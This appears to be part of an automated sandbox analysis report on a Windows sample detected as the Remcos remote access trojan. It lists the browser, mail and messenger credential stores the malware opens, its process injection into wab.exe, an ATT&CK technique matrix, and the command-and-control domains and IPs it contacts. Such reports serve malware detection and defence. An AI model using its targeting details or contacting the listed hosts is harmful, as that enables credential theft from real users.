            Source: wab.exe, 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
            Source: wab.exe, 00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: wab.exe, 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D72933 cpuid 5_2_21D72933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_21D72264
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,7_2_004082CD
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_00403382 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403382
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword7_2_004033F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword7_2_00402DB3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword7_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7688, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-KRPMMIJump to behavior
            Source: Yara matchFile source: 00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            2
            Credentials in Registry
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter
            Logon Script (Windows)212
            Process Injection
            1
            Software Packing
            1
            Credentials In Files
            3
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS129
            System Information Discovery
            Distributed Component Object Model2
            Clipboard Data
            1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets341
            Security Software Discovery
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
            Virtualization/Sandbox Evasion
            Cached Domain Credentials131
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture113
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1471802 Sample: 3RBUJ4RX4a.exe Startdate: 11/07/2024 Architecture: WINDOWS Score: 100 44 kezdns.pro 2->44 46 zakk.co.za 2->46 48 geoplugin.net 2->48 58 Found malware configuration 2->58 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 10 other signatures 2->64 9 3RBUJ4RX4a.exe 25 2->9         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\...32onfecund.pel, ASCII 9->32 dropped 72 Suspicious powershell command line found 9->72 13 powershell.exe 20 9->13         started        signatures6 process7 file8 34 C:\Users\user\AppData\...\3RBUJ4RX4a.exe, PE32 13->34 dropped 36 C:\Users\...\3RBUJ4RX4a.exe:Zone.Identifier, ASCII 13->36 dropped 74 Writes to foreign memory regions 13->74 76 Found suspicious powershell code related to unpacking or dynamic code loading 13->76 78 Hides threads from debuggers 13->78 80 Powershell drops PE file 13->80 17 wab.exe 3 13 13->17         started        21 conhost.exe 13->21         started        signatures9 process10 dnsIp11 38 kezdns.pro 95.216.5.32, 30303, 49712, 49713 HETZNER-ASDE Germany 17->38 40 zakk.co.za 102.218.215.35, 443, 49711 CKL1-ASNKE unknown 17->40 42 geoplugin.net 178.237.33.50, 49715, 80 ATOM86-ASATOM86NL Netherlands 17->42 50 Detected Remcos RAT 17->50 52 Tries to harvest and steal browser information (history, passwords, etc) 17->52 54 Maps a DLL or memory area into another process 17->54 56 Hides threads from debuggers 17->56 23 wab.exe 1 17->23         started        26 wab.exe 1 17->26         started        28 wab.exe 14 17->28         started        30 2 other processes 17->30 signatures12 process13 signatures14 66 Tries to steal Instant Messenger accounts or passwords 23->66 68 Tries to harvest and steal browser information (history, passwords, etc) 23->68 70 Tries to steal Mail credentials (via file / registry access) 26->70

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.